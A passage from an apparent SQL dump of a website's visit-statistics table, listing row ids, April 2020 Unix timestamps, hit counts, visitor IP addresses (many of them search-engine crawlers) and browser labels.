0,0,'91.196.178.169','chrome'),(495609,1586324811,1,1,0,0,'66.249.64.23','chrome'),(495610,1586325215,1,1,0,0,'8.29.198.26','other'),(495611,1586325603,1,1,0,0,'157.55.39.55','other'),(495612,1586325774,1,1,0,0,'91.196.178.69','chrome'),(495613,1586325797,1,1,0,0,'8.29.198.27','other'),(495614,1586325977,1,1,0,0,'91.196.178.183','chrome'),(495615,1586326035,1,1,0,0,'157.55.39.206','other'),(495616,1586326922,1,1,0,0,'66.249.70.36','chrome'),(495617,1586327069,1,1,0,0,'66.249.64.24','chrome'),(495618,1586327402,2,2,0,0,'66.249.64.23','chrome'),(495619,1586327695,1,1,0,0,'157.55.39.206','other'),(495620,1586328042,1,1,0,0,'91.196.178.76','chrome'),(495621,1586328067,2,2,0,0,'157.55.39.55','other'),(495622,1586328513,4,4,0,0,'66.249.64.25','chrome'),(495623,1586328642,1,1,0,0,'66.249.64.24','chrome'),(495624,1586328666,2,2,0,0,'157.55.39.206','other'),(495625,1586328710,3,3,0,0,'66.249.64.23','chrome'),(495626,1586329121,1,1,0,0,'178.154.200.19','other'),(495627,1586329587,2,2,0,0,'66.249.64.24','chrome'),(495628,1586330291,1,1,0,0,'157.55.39.206','other'),(495629,1586330329,1,1,0,0,'178.154.200.87','other'),(495630,1586330378,1,1,0,0,'213.180.203.90','other'),(495631,1586330665,1,1,0,0,'91.196.178.183','chrome'),(495632,1586330843,1,1,0,0,'66.249.64.24','chrome'),(495633,1586331415,1,1,0,0,'66.249.70.36','chrome'),(495634,1586332037,2,2,0,0,'157.55.39.55','other'),(495635,1586332498,8,8,0,0,'77.120.98.235','other'),(495636,1586332527,1,1,0,0,'91.196.178.180','chrome'),(495637,1586332630,1,1,0,0,'213.180.203.70','other'),(495638,1586332754,1,1,0,0,'185.30.202.111','chrome'),(495639,1586332800,2,2,0,0,'66.249.64.24','chrome'),(495640,1586332851,1,1,0,0,'66.249.64.23','chrome'),(495641,1586332960,1,1,0,0,'46.211.60.156','chrome'),(495642,1586333265,1,1,0,0,'157.55.39.55','other'),(495643,1586333369,1,1,0,0,'178.154.200.87','other'),(495644,1586333685,1,1,0,0,'91.196.178.68','chrome'),(495645,1586334597,1,1,0,0,'157.55.39.55','other'),(495646,1586334662,1,1,0,0,'157.55.39.206','other'),(495647,1586335425,1,1,0,0,'213.180.203.148','other'),(495648,1586335820,2,2,0,0,'66.249.64.24','chrome'),(495649,1586336047,1,1,0,0,'8.29.198.27','other'),(495650,1586336188,1,1,0,0,'66.249.64.25','chrome'),(495651,1586336358,1,1,0,0,'91.196.178.68','chrome'),(495652,1586336417,2,2,0,0,'91.196.178.165','chrome'),(495653,1586336469,2,2,0,0,'173.252.111.8','other'),(495654,1586336470,3,3,0,0,'173.252.111.19','other'),(495655,1586336472,1,1,0,0,'173.252.111.1','other'),(495656,1586336493,1,1,0,0,'178.95.159.141','chrome'),(495657,1586336541,1,1,0,0,'173.252.95.37','other'),(495658,1586336542,1,1,0,0,'173.252.87.31','other'),(495659,1586336590,2,2,0,0,'173.252.111.22','other'),(495660,1586336613,1,1,0,0,'91.196.179.33','chrome'),(495661,1586336622,1,1,0,0,'8.29.198.26','other'),(495662,1586336781,1,1,0,0,'209.17.97.98','other'),(495663,1586336798,1,1,0,0,'157.55.39.55','other'),(495664,1586336884,1,1,0,0,'66.249.70.38','chrome'),(495665,1586337043,1,1,0,0,'95.134.221.157','other'),(495666,1586337121,3,3,0,0,'66.249.64.23','chrome'),(495667,1586337268,1,1,0,0,'91.196.178.170','chrome'),(495668,1586337311,2,2,0,0,'91.196.178.68','chrome'),(495669,1586337489,1,1,0,0,'94.153.75.71','chrome'),(495670,1586337611,1,1,0,0,'91.196.178.119','chrome'),(495671,1586337691,1,1,0,0,'46.201.174.48','chrome'),(495672,1586337708,1,1,0,0,'91.124.119.55','chrome'),(495673,1586337717,1,1,0,0,'88.155.126.140','chrome'),(495674,1586337763,1,1,0,0,'46.133.111.211','chrome'),(495675,1586337765,1,1,0,0,'37.53.228.153','chrome'),(495676,1586337881,1,1,0,0,'94.153.13.137','chrome'),(495677,1586337884,1,1,0,0,'91.196.178.43','chrome'),(495678,1586337981,1,1,0,0,'91.196.177.21','chrome'),(495679,1586338007,1,1,0,0,'178.92.251.254','chrome'),(495680,1586338011,1,1,0,0,'178.154.200.112','other'),(495681,1586338212,1,1,0,0,'91.196.178.142','chrome'),(495682,1586338214,1,1,0,0,'109.86.35.199','chrome'),(495683,1586338277,1,1,0,0,'91.196.178.36','chrome'),(495684,1586338302,1,1,0,0,'178.154.200.222','other'),(495685,1586338349,2,2,0,0,'66.249.64.24','chrome'),(495686,1586338379,3,3,0,0,'66.249.64.23','chrome'),(495687,1586338381,1,1,0,0,'46.133.2.192','chrome'),(495688,1586338499,1,1,0,0,'37.53.122.176','chrome'),(495689,1586338509,1,1,0,0,'213.180.203.16','other'),(495690,1586338541,1,1,0,0,'92.112.105.124','chrome'),(495691,1586338607,1,1,0,0,'3.231.166.12','chrome'),(495692,1586338883,1,1,0,0,'91.196.178.29','chrome'),(495693,1586338975,1,1,0,0,'91.196.178.162','chrome'),(495694,1586339009,1,1,0,0,'91.196.178.68','chrome'),(495695,1586339039,1,1,0,0,'91.196.178.189','chrome'),(495696,1586339050,1,1,0,0,'37.54.115.10','other'),(495697,1586339255,1,1,0,0,'178.133.132.147','other'),(495698,1586339430,2,2,0,0,'138.201.12.50','other'),(495699,1586339431,1,1,0,0,'94.153.80.140','chrome'),(495700,1586339434,1,1,0,0,'138.201.12.50','msie'),(495701,1586339620,1,1,0,0,'37.73.9.51','chrome'),(495702,1586339639,1,1,0,0,'91.196.177.208','chrome'),(495703,1586339770,1,1,0,0,'66.249.64.25','chrome'),(495704,1586340015,1,1,0,0,'91.196.178.167','firefox'),(495705,1586340087,1,1,0,0,'93.73.199.52','chrome'),(495706,1586340272,1,1,0,0,'91.196.178.180','chrome'),(495707,1586340639,1,1,0,0,'91.196.178.133','chrome'),(495708,1586340998,2,2,0,0,'66.249.64.25','chrome'),(495709,1586341166,1,1,0,0,'91.196.178.183','chrome'),(495710,1586341173,1,1,0,0,'66.249.64.23','chrome'),(495711,1586341212,1,1,0,0,'91.196.178.180','chrome'),(495712,1586341250,2,2,0,0,'46.211.3.75','chrome'),(495713,1586341299,1,1,0,0,'178.95.66.67','chrome'),(495714,1586341324,1,1,0,0,'157.55.39.206','other'),(495715,1586341501,1,1,0,0,'157.55.39.55','other'),(495716,1586341612,1,1,0,0,'37.53.225.93','chrome'),(495717,1586341621,1,1,0,0,'157.55.39.107','other'),(495718,1586341626,1,1,0,0,'178.154.200.175','other'),(495719,1586341697,1,1,0,0,'91.196.178.27','chrome'),(495720,1586342229,1,1,0,0,'91.196.179.134','chrome'),(495721,1586342673,1,1,0,0,'66.249.64.24','chrome'),(495722,1586343030,1,1,0,0,'91.196.178.27','chrome'),(495723,1586343081,2,2,0,0,'66.249.64.23','chrome'),(495724,1586343159,1,1,0,0,'91.196.178.168','chrome'),(495725,1586343172,1,1,0,0,'91.196.178.73','chrome'),(495726,1586343400,1,1,0,0,'213.180.203.146','other'),(495727,1586343417,1,1,0,0,'88.155.96.123','chrome'),(495728,1586343468,1,1,0,0,'178.154.200.17','other'),(495729,1586343588,1,1,0,0,'91.196.178.80','chrome'),(495730,1586343712,2,2,0,0,'157.55.39.107','other'),(495731,1586343986,2,2,0,0,'95.213.141.126','opera'),(495732,1586344051,1,1,0,0,'92.113.126.11','chrome'),(495733,1586344061,3,3,0,0,'157.55.39.55','other'),(495734,1586344082,1,1,0,0,'66.249.64.24','chrome'),(495735,1586344230,1,1,0,0,'213.180.203.155','other'),(495736,1586344400,1,1,0,0,'46.211.51.9','other'),(495737,1586344552,1,1,0,0,'173.252.111.10','other'),(495738,1586344553,1,1,0,0,'173.252.111.12','other'),(495739,1586344590,1,1,0,0,'91.196.178.28','chrome'),(495740,1586344627,1,1,0,0,'94.158.95.126','chrome'),(495741,1586344697,1,1,0,0,'91.196.178.157','chrome'),(495742,1586344728,2,2,0,0,'157.55.39.107','other'),(495743,1586344846,1,1,0,0,'91.196.177.46','chrome'),(495744,1586344904,1,1,0,0,'178.154.200.176','other'),(495745,1586345067,1,1,0,0,'91.196.178.183','chrome'),(495746,1586345509,1,1,0,0,'37.54.18.81','chrome'),(495747,1586345568,1,1,0,0,'66.249.64.24','chrome'),(495748,1586345667,1,1,0,0,'91.196.178.173','chrome'),(495749,1586345872,1,0,1,0,'157.55.39.55',''),(495750,1586346192,1,1,0,0,'178.154.200.19','other'),(495751,1586346302,1,1,0,0,'91.196.178.163','chrome'),(495752,1586346377,2,2,0,0,'66.249.64.25','chrome'),(495753,1586346483,2,2,0,0,'157.55.39.206','other'),(495754,1586346515,1,1,0,0,'94.153.26.145','chrome'),(495755,1586346876,1,1,0,0,'8.29.198.27','other'),(495756,1586347392,1,1,0,0,'91.196.178.172','firefox'),(495757,1586347456,1,1,0,0,'8.29.198.25','other'),(495758,1586347460,1,1,0,0,'91.196.178.154','chrome'),(495759,1586347546,1,1,0,0,'93.126.76.111','chrome'),(495760,1586347616,1,1,0,0,'91.196.178.133','chrome'),(495761,1586347678,1,1,0,0,'173.252.111.22','other'),(495762,1586347679,2,2,0,0,'173.252.111.5','other'),(495764,1586347691,2,2,0,0,'173.252.111.6','other'),(495768,1586347692,2,2,0,0,'173.252.111.13','other'),(495770,1586347709,1,1,0,0,'91.196.177.46','chrome'),(495771,1586348031,2,2,0,0,'157.55.39.107','other'),(495772,1586348188,1,1,0,0,'46.211.65.129','chrome'),(495773,1586348261,1,1,0,0,'109.74.154.72','chrome'),(495774,1586348267,1,1,0,0,'66.249.70.33','chrome'),(495775,1586348420,3,3,0,0,'66.249.64.25','chrome'),(495776,1586348450,1,1,0,0,'173.252.95.10','other'),(495777,1586348476,1,1,0,0,'66.249.64.23','chrome'),(495778,1586348510,2,2,0,0,'66.249.70.38','chrome'),(495779,1586348559,1,1,0,0,'94.153.66.37','chrome'),(495780,1586348584,1,1,0,0,'66.249.64.24','chrome'),(495781,1586348597,1,1,0,0,'157.55.39.55','other'),(495782,1586349031,1,1,0,0,'131.220.6.152','chrome'),(495783,1586349332,1,1,0,0,'91.196.177.46','chrome'),(495784,1586349407,1,1,0,0,'178.154.200.114','other'),(495785,1586349420,1,1,0,0,'91.196.178.68','chrome'),(495786,1586349451,1,1,0,0,'178.92.249.210','chrome'),(495787,1586349550,1,1,0,0,'178.154.200.75','other'),(495788,1586349792,1,1,0,0,'37.52.16.66','chrome'),(495789,1586349875,1,1,0,0,'157.55.39.107','other'),(495790,1586350180,1,1,0,0,'157.55.39.206','other'),(495791,1586350450,1,1,0,0,'213.180.203.17','other'),(495792,1586350667,2,2,0,0,'130.180.218.76','chrome'),(495793,1586350827,8,8,0,0,'77.120.98.235','other'),(495794,1586350842,1,1,0,0,'66.249.64.24','chrome'),(495795,1586350903,1,1,0,0,'178.154.200.131','other'),(495796,1586351014,1,1,0,0,'91.196.178.99','chrome'),(495797,1586351148,1,1,0,0,'66.249.70.38','chrome'),(495798,1586351238,2,2,0,0,'66.249.64.25','chrome'),(495799,1586351617,1,1,0,0,'91.196.178.175','chrome'),(495800,1586351684,1,1,0,0,'157.55.39.206','other'),(495801,1586351721,1,1,0,0,'91.196.177.193','chrome'),(495802,1586351742,1,1,0,0,'66.249.64.23','chrome'),(495803,1586351941,2,2,0,0,'91.196.177.15','chrome'),(495804,1586352388,1,1,0,0,'178.154.200.234','other'),(495805,1586352926,1,1,0,0,'213.180.203.90','other'),(495806,1586353113,1,1,0,0,'157.55.39.55','other'),(495807,1586354120,1,1,0,0,'195.128.139.105','firefox'),(495808,1586354317,2,2,0,0,'91.196.178.183','chrome'),(495809,1586354321,1,1,0,0,'91.196.178.175','chrome'),(495810,1586354467,1,1,0,0,'157.55.39.107','other'),(495811,1586354484,1,1,0,0,'91.196.177.46','chrome'),(495812,1586354506,1,1,0,0,'213.180.203.190','other'),(495813,1586354562,1,1,0,0,'2.47.39.219','other'),(495814,1586354815,1,1,0,0,'178.154.200.100','other'),(495815,1586355044,1,1,0,0,'91.196.178.88','firefox'),(495816,1586355231,1,1,0,0,'195.238.116.155','chrome'),(495817,1586355421,1,1,0,0,'37.54.114.163','chrome'),(495818,1586356048,1,1,0,0,'91.196.178.183','chrome'),(495819,1586356237,1,0,1,0,'157.55.39.206',''),(495820,1586356951,2,2,0,0,'178.154.200.222','other'),(495821,1586357398,1,1,0,0,'157.55.39.55','other'),(495822,1586357421,1,1,0,0,'91.196.178.130','other'),(495823,1586357587,1,1,0,0,'207.46.13.51','other'),(495824,1586357602,1,1,0,0,'91.210.20.6','chrome'),(495825,1586357615,1,1,0,0,'213.180.203.16','other'),(495826,1586357708,2,2,0,0,'8.29.198.27','other'),(495827,1586358421,1,1,0,0,'173.252.79.15','other'),(495828,1586358799,1,1,0,0,'66.249.64.23','chrome'),(495829,1586359399,1,0,1,0,'157.55.39.55',''),(495830,1586359470,2,2,0,0,'157.55.39.206','other'),(495831,1586360163,1,1,0,0,'95.216.19.59','other'),(495832,1586360479,1,1,0,0,'185.151.174.89','chrome'),(495833,1586360774,1,1,0,0,'51.68.152.26','chrome'),(495834,1586361530,1,1,0,0,'207.46.13.51','other'),(495835,1586361738,1,1,0,0,'178.154.200.97','other'),(495836,1586361821,3,3,0,0,'66.249.64.23','chrome'),(495837,1586362093,2,2,0,0,'66.249.64.25','chrome'),(495838,1586362331,1,1,0,0,'157.55.39.206','other'),(495839,1586362456,1,1,0,0,'93.77.251.196','chrome'),(495840,1586363315,3,3,0,0,'66.249.64.24','chrome'),(495841,1586363369,1,1,0,0,'157.55.39.55','other'),(495842,1586363610,1,1,0,0,'66.249.70.36','chrome'),(495843,1586363923,1,1,0,0,'207.46.13.51','other'),(495844,1586365063,2,2,0,0,'66.249.70.38','chrome'),(495845,1586365157,8,8,0,0,'77.120.98.235','other'),(495846,1586365186,2,2,0,0,'157.55.39.206','other'),(495847,1586365194,1,1,0,0,'66.249.64.25','chrome'),(495848,1586365247,1,1,0,0,'91.196.178.27','chrome'),(495849,1586365358,2,2,0,0,'66.249.64.24','chrome'),(495850,1586365428,1,1,0,0,'94.153.0.251','chrome'),(495851,1586365910,1,1,0,0,'213.180.203.38','other'),(495852,1586366292,4,4,0,0,'66.249.64.23','chrome'),(495853,1586366412,1,1,0,0,'192.36.53.165','other'),(495854,1586366661,1,1,0,0,'94.153.0.251','chrome'),(495855,1586366665,1,1,0,0,'66.249.70.33','chrome'),(495856,1586367042,1,1,0,0,'207.46.13.51','other'),(495857,1586367358,1,1,0,0,'213.180.203.16','other'),(495858,1586367368,1,1,0,0,'157.55.39.202','other'),(495859,1586368058,1,1,0,0,'66.249.64.25','chrome'),(495860,1586368080,1,0,1,0,'66.249.64.24',''),(495861,1586368539,2,2,0,0,'8.29.198.26','other'),(495862,1586368716,1,1,0,0,'66.249.70.38','chrome'),(495863,1586368752,2,2,0,0,'157.55.39.206','other'),(495864,1586368878,2,2,0,0,'178.154.200.222','other'),(495865,1586368941,1,1,0,0,'213.180.203.16','other'),(495866,1586369038,2,2,0,0,'91.196.178.29','chrome'),(495867,1586369348,3,3,0,0,'66.249.64.25','chrome'),(495868,1586369455,3,3,0,0,'66.249.64.24','chrome'),(495869,1586369903,1,1,0,0,'91.196.178.162','chrome'),(495870,1586369931,2,2,0,0,'66.249.64.23','chrome'),(495871,1586369952,1,1,0,0,'157.55.39.202','other'),(495872,1586370496,2,2,0,0,'66.249.64.25','chrome'),(495873,1586370508,2,2,0,0,'66.249.64.24','chrome'),(495874,1586370552,2,2,0,0,'207.46.13.51','other'),(495875,1586370876,1,1,0,0,'66.249.70.38','chrome'),(495876,1586371200,2,2,0,0,'178.154.200.222','other'),(495877,1586371573,1,1,0,0,'66.249.64.24','chrome'),(495878,1586371877,1,1,0,0,'66.249.64.25','chrome'),(495879,1586371986,1,1,0,0,'91.196.178.181','chrome'),(495880,1586372211,3,3,0,0,'66.249.64.23','chrome'),(495881,1586373109,1,1,0,0,'94.154.222.87','chrome'),(495882,1586373206,1,1,0,0,'94.153.80.177','chrome'),(495883,1586373673,1,1,0,0,'194.44.228.210','chrome'),(495884,1586373927,2,2,0,0,'66.249.64.25','chrome'),(495885,1586373960,6,6,0,0,'66.249.64.24','chrome'),(495886,1586374005,2,2,0,0,'66.249.64.23','chrome'),(495887,1586374614,1,1,0,0,'157.55.39.202','other'),(495888,1586375527,3,3,0,0,'66.249.64.23','chrome'),(495889,1586375538,1,1,0,0,'66.249.64.24','chrome'),(495890,1586375778,1,1,0,0,'91.196.178.27','chrome'),(495891,1586375867,2,2,0,0,'66.249.64.25','chrome'),(495892,1586375930,1,1,0,0,'91.196.178.111','chrome'),(495893,1586376156,1,1,0,0,'66.249.70.38','chrome'),(495894,1586376486,1,1,0,0,'91.196.178.87','chrome'),(495895,1586376518,1,1,0,0,'157.55.39.206','other'),(495896,1586377132,1,1,0,0,'69.30.211.2','other'),(495897,1586377570,5,5,0,0,'66.249.64.23','chrome'),(495898,1586377632,1,1,0,0,'66.249.64.24','chrome'),(495899,1586377706,1,1,0,0,'66.249.64.25','chrome'),(495900,1586377749,1,1,0,0,'157.55.39.202','other'),(495901,1586377787,2,0,2,0,'157.55.39.206',''),(495902,1586378407,1,1,0,0,'69.30.211.2','other'),(495903,1586378446,1,1,0,0,'157.55.39.206','other'),(495904,1586378453,1,1,0,0,'66.249.69.38','chrome'),(495905,1586378555,1,1,0,0,'138.246.253.15','chrome'),(495906,1586379369,1,1,0,0,'8.29.198.26','other'),(495907,1586379678,1,1,0,0,'66.249.64.23','chrome'),(495908,1586379812,1,1,0,0,'173.252.111.1','other'),(495909,1586379946,1,1,0,0,'8.29.198.25','other'),(495910,1586380015,1,1,0,0,'178.154.200.222','other'),(495911,1586380190,1,1,0,0,'95.132.39.65','chrome'),(495912,1586380204,8,8,0,0,'77.120.98.235','other'),(495913,1586380208,4,4,0,0,'207.46.13.51','other'),(495914,1586380212,3,3,0,0,'157.55.39.202','other'),(495915,1586380233,5,5,0,0,'157.55.39.206','other'),(495916,1586380592,1,1,0,0,'66.249.64.25','chrome'),(495917,1586382349,1,1,0,0,'66.249.64.24','chrome'),(495918,1586382597,1,1,0,0,'66.249.64.23','chrome'),(495919,1586383302,1,1,0,0,'173.252.87.2','other'),(495920,1586385565,1,1,0,0,'66.249.64.25','chrome'),(495921,1586385935,1,1,0,0,'157.55.39.202','other'),(495922,1586386041,1,1,0,0,'35.232.101.8','firefox'),(495923,1586386056,1,1,0,0,'103.251.27.215','firefox'),(495924,1586386907,1,1,0,0,'157.55.39.206','other'),(495925,1586387025,3,3,0,0,'66.249.64.24','chrome'),(495926,1586387427,1,1,0,0,'66.249.64.25','chrome'),(495927,1586387570,1,1,0,0,'66.249.70.36','chrome'),(495928,1586387959,1,1,0,0,'66.249.64.23','chrome'),(495929,1586388027,1,1,0,0,'157.55.39.206','other'),(495930,1586389444,1,1,0,0,'66.249.64.23','chrome'),(495931,1586389579,2,2,0,0,'66.249.64.24','chrome'),(495932,1586390107,1,1,0,0,'62.205.134.182','other'),(495933,1586390194,1,1,0,0,'8.29.198.27','other'),(495934,1586390777,1,1,0,0,'8.29.198.25','other'),(495935,1586390887,1,1,0,0,'157.55.39.206','other'),(495936,1586391391,1,1,0,0,'66.249.64.23','chrome'),(495937,1586392172,1,1,0,0,'68.183.179.184','chrome'),(495938,1586392657,1,1,0,0,'66.249.64.23','chrome'),(495939,1586394297,1,1,0,0,'157.55.39.202','other'),(495940,1586394339,2,2,0,0,'157.55.39.206','other'),(495941,1586394789,1,1,0,0,'47.108.80.103','other'),(495942,1586396415,8,8,0,0,'77.120.98.235','other'),(495943,1586397463,1,1,0,0,'31.13.115.16','other'),(495944,1586397972,1,1,0,0,'66.249.64.24','chrome'),(495945,1586398872,1,1,0,0,'207.46.13.245','other'),(495946,1586401019,1,1,0,0,'8.29.198.25','other'),(495947,1586401314,1,1,0,0,'66.249.64.23','chrome'),(495948,1586401607,1,1,0,0,'8.29.198.27','other'),(495949,1586401753,1,1,0,0,'157.55.39.206','other'),(495950,1586402484,1,1,0,0,'207.46.13.245','other'),(495951,1586402824,1,1,0,0,'66.249.70.33','chrome'),(495952,1586402969,2,2,0,0,'66.249.64.23','chrome'),(495953,1586403434,1,1,0,0,'157.55.39.206','other'),(495954,1586403481,1,1,0,0,'91.196.178.53','chrome'),(495955,1586403854,1,1,0,0,'66.249.70.33','chrome'),(495956,1586404516,1,1,0,0,'157.55.39.206','other'),(495957,1586404530,1,1,0,0,'91.196.178.53','chrome'),(495958,1586405433,1,1,0,0,'91.196.178.53','chrome'),(495959,1586405764,1,1,0,0,'66.249.64.25','chrome'),(495960,1586405883,1,1,0,0,'151.80.39.236','other'),(495961,1586406142,1,1,0,0,'77.123.146.25','chrome'),(495962,1586406382,2,2,0,0,'157.55.39.206','other'),(495963,1586407059,1,1,0,0,'62.205.134.182','other'),(495964,1586407318,1,1,0,0,'66.249.64.25','chrome'),(495965,1586407641,1,1,0,0,'207.46.13.11','other'),(495966,1586408159,1,1,0,0,'157.55.39.206','other'),(495967,1586409325,1,1,0,0,'207.46.13.11','other'),(495968,1586410373,1,1,0,0,'66.249.64.25','chrome'),(495969,1586410928,1,1,0,0,'66.249.64.23','chrome'),(495970,1586410938,1,1,0,0,'82.202.161.133','other'),(495971,1586411411,1,1,0,0,'207.46.13.11','other'),(495972,1586411846,2,2,0,0,'8.29.198.27','other'),(495973,1586411945,2,2,0,0,'66.249.64.24','chrome'),(495974,1586411988,2,2,0,0,'66.249.64.23','chrome'),(495975,1586412799,1,1,0,0,'66.249.70.33','chrome'),(495976,1586412925,8,8,0,0,'77.120.98.235','other'),(495977,1586413150,1,1,0,0,'66.249.64.25','chrome'),(495978,1586413754,1,0,1,0,'157.55.39.206',''),(495979,1586414382,1,1,0,0,'95.91.211.112','firefox'),(495980,1586414549,7,7,0,0,'94.130.9.183','other'),(495981,1586415259,1,1,0,0,'207.46.13.11','other'),(495982,1586415314,1,1,0,0,'212.90.190.6','chrome'),(495983,1586415452,3,3,0,0,'94.130.9.183','other'),(495984,1586415524,1,1,0,0,'188.19.60.143','chrome'),(495985,1586416850,1,1,0,0,'66.249.64.23','chrome'),(495986,1586416864,2,2,0,0,'207.46.13.11','other'),(495987,1586416870,1,1,0,0,'212.90.190.6','chrome'),(495988,1586417119,1,1,0,0,'66.249.64.24','chrome'),(495989,1586417803,1,1,0,0,'207.46.13.11','other'),(495990,1586417805,1,1,0,0,'31.13.127.20','other'),(495991,1586417961,1,1,0,0,'178.154.200.222','other'),(495992,1586417963,1,1,0,0,'213.180.203.16','other'),(495993,1586418088,1,1,0,0,'66.249.64.24','chrome'),(495994,1586418147,1,1,0,0,'195.10.210.70','chrome'),(495995,1586418152,1,0,1,0,'157.55.39.206',''),(495996,1586418242,1,1,0,0,'91.196.177.46','chrome'),(495997,1586418557,1,1,0,0,'66.249.64.23','chrome'),(495998,1586418953,1,1,0,0,'66.249.70.38','chrome'),(495999,1586421622,1,1,0,0,'207.46.13.11','other'),(496000,1586421702,1,0,1,0,'66.249.64.24',''),(496001,1586421927,1,1,0,0,'93.73.160.193','firefox'),(496002,1586422002,1,1,0,0,'91.196.178.89','chrome'),(496003,1586422011,1,1,0,0,'157.55.39.206','other'),(496004,1586422111,1,1,0,0,'46.211.54.202','chrome'),(496005,1586422251,1,1,0,0,'66.249.64.24','chrome'),(496006,1586422593,1,1,0,0,'91.196.178.183','chrome'),(496007,1586422674,1,1,0,0,'8.29.198.26','other'),(496008,1586423019,1,1,0,0,'173.252.111.8','other'),(496009,1586423020,1,1,0,0,'173.252.111.3','other'),(496010,1586423144,1,1,0,0,'93.73.199.52','chrome'),(496011,1586423269,1,1,0,0,'8.29.198.27','other'),(496012,1586423492,1,1,0,0,'66.249.64.25','chrome'),(496013,1586424098,3,3,0,0,'157.55.39.206','other'),(496014,1586424200,1,1,0,0,'66.249.64.23','chrome'),(496015,1586424218,1,1,0,0,'46.211.50.227','chrome'),(496016,1586424918,1,1,0,0,'18.234.200.129','chrome'),(496017,1586425957,1,1,0,0,'66.249.64.23','chrome'),(496018,1586426849,1,1,0,0,'66.249.64.24','chrome'),(496019,1586426885,2,2,0,0,'157.55.39.206','other'),(496020,1586426930,1,1,0,0,'207.46.13.11','other'),(496021,1586427665,1,1,0,0,'66.249.64.23','chrome'),(496022,1586427884,1,1,0,0,'167.71.59.125','chrome'),(496023,1586428159,1,1,0,0,'91.196.179.134','chrome'),(496024,1586428198,8,8,0,0,'77.120.98.235','other'),(496025,1586428348,1,1,0,0,'46.164.130.94','chrome'),(496026,1586428462,1,1,0,0,'157.55.39.206','other'),(496027,1586428526,1,1,0,0,'66.249.70.38','chrome'),(496028,1586428660,2,2,0,0,'207.46.13.11','other'),(496029,1586429494,1,1,0,0,'178.154.200.222','other'),(496030,1586429503,1,1,0,0,'66.249.64.24','chrome'),(496031,1586429816,2,2,0,0,'157.55.39.206','other'),(496032,1586430368,1,1,0,0,'213.180.203.16','other'),(496033,1586430379,1,1,0,0,'66.249.70.36','chrome'),(496034,1586430583,4,4,0,0,'178.154.200.222','other'),(496035,1586430874,1,1,0,0,'91.196.178.84','firefox'),(496036,1586431631,1,1,0,0,'80.77.32.8','chrome'),(496037,1586431889,1,1,0,0,'91.196.178.84','firefox'),(496038,1586431891,3,3,0,0,'178.154.200.222','other'),(496039,1586431985,1,1,0,0,'66.249.64.24','chrome'),(496040,1586432471,1,1,0,0,'157.55.39.206','other'),(496041,1586432597,1,1,0,0,'66.249.64.23','chrome'),(496042,1586432790,1,1,0,0,'207.46.13.11','other'),(496043,1586433000,1,1,0,0,'91.196.178.179','chrome'),(496044,1586433336,1,1,0,0,'109.74.154.72','chrome'),(496045,1586433443,1,1,0,0,'213.180.203.16','other'),(496046,1586433500,2,2,0,0,'8.29.198.25','other'),(496047,1586433613,1,1,0,0,'66.249.64.23','chrome'),(496048,1586433972,1,1,0,0,'66.249.70.38','chrome'),(496049,1586434601,1,1,0,0,'178.154.200.222','other'),(496050,1586434940,1,1,0,0,'207.46.13.11','other'),(496051,1586435285,1,1,0,0,'66.249.64.25','chrome'),(496052,1586435393,1,1,0,0,'157.55.39.206','other'),(496053,1586435586,1,1,0,0,'131.220.6.152','chrome'),(496054,1586435692,1,1,0,0,'18.191.207.220','chrome'),(496055,1586436083,2,2,0,0,'66.249.64.24','chrome'),(496056,1586436085,1,0,1,0,'66.249.64.23',''),(496057,1586436268,1,1,0,0,'91.205.205.96','chrome'),(496058,1586436649,1,1,0,0,'213.180.203.16','other'),(496059,1586436669,1,1,0,0,'178.154.200.220','other'),(496060,1586437073,1,1,0,0,'66.220.149.16','other'),(496061,1586437075,1,1,0,0,'66.220.149.11','other'),(496062,1586437385,1,0,1,0,'207.46.13.11',''),(496063,1586437583,4,4,0,0,'178.154.200.222','other'),(496064,1586437669,1,1,0,0,'66.249.70.38','chrome'),(496065,1586438192,1,1,0,0,'213.180.203.16','other'),(496066,1586438512,1,1,0,0,'178.154.200.222','other'),(496067,1586438682,1,1,0,0,'66.249.64.23','chrome'),(496068,1586439015,2,2,0,0,'91.196.177.15','other'),(496069,1586439534,5,5,0,0,'178.154.200.222','other'),(496070,1586439684,1,1,0,0,'149.154.161.18','other'),(496071,1586439721,1,1,0,0,'178.154.200.196','other'),(496073,1586439726,1,1,0,0,'176.67.86.144','other'),(496074,1586439745,1,1,0,0,'91.196.178.68','chrome'),(496075,1586440249,1,1,0,0,'91.196.178.88','firefox'),(496076,1586440533,1,1,0,0,'178.154.200.222','other'),(496077,1586440749,1,1,0,0,'91.196.177.15','chrome'),(496078,1586440879,1,1,0,0,'91.196.178.14','chrome'),(496079,1586441015,1,1,0,0,'77.111.244.119','chrome'),(496080,1586441166,1,1,0,0,'178.154.200.41','other'),(496081,1586441309,1,1,0,0,'157.55.39.206','other'),(496082,1586441481,1,1,0,0,'213.180.203.16','other'),(496083,1586441485,1,1,0,0,'66.249.64.25','chrome'),(496084,1586441972,1,1,0,0,'66.102.9.164','chrome'),(496085,1586442050,1,1,0,0,'91.196.177.15','chrome'),(496086,1586442052,5,5,0,0,'178.154.200.222','other'),(496087,1586442425,1,1,0,0,'93.78.187.225','opera'),(496088,1586442498,1,1,0,0,'157.55.39.206','other'),(496089,1586442515,2,2,0,0,'66.249.64.25','chrome'),(496090,1586442634,2,2,0,0,'207.46.13.11','other'),(496091,1586442884,2,2,0,0,'213.180.203.16','other'),(496092,1586443375,2,2,0,0,'178.154.200.222','other'),(496093,1586443541,8,8,0,0,'77.120.98.235','other'),(496094,1586443744,1,0,1,0,'157.55.39.206',''),(496095,1586444013,2,2,0,0,'157.55.39.206','other'),(496096,1586444104,1,1,0,0,'213.180.203.17','other'),(496097,1586444324,6,6,0,0,'178.154.200.222','other'),(496098,1586444325,1,1,0,0,'8.29.198.27','other'),(496099,1586444370,1,1,0,0,'213.180.203.122','other'),(496100,1586444819,1,1,0,0,'213.180.203.16','other'),(496101,1586444918,1,1,0,0,'8.29.198.25','other'),(496102,1586445431,1,1,0,0,'66.249.64.23','chrome'),(496103,1586445676,3,3,0,0,'178.154.200.222','other'),(496104,1586445678,1,1,0,0,'66.249.64.25','chrome'),(496105,1586445917,1,1,0,0,'157.55.39.206','other'),(496106,1586446360,1,1,0,0,'207.46.13.11','other'),(496107,1586446458,1,1,0,0,'107.21.1.8','other'),(496108,1586446460,1,1,0,0,'54.208.102.37','other'),(496109,1586446565,1,1,0,0,'66.249.64.23','chrome'),(496110,1586446774,3,3,0,0,'178.154.200.222','other'),(496111,1586447224,1,1,0,0,'66.249.64.25','chrome'),(496112,1586447228,1,1,0,0,'178.251.109.249','chrome'),(496113,1586447261,1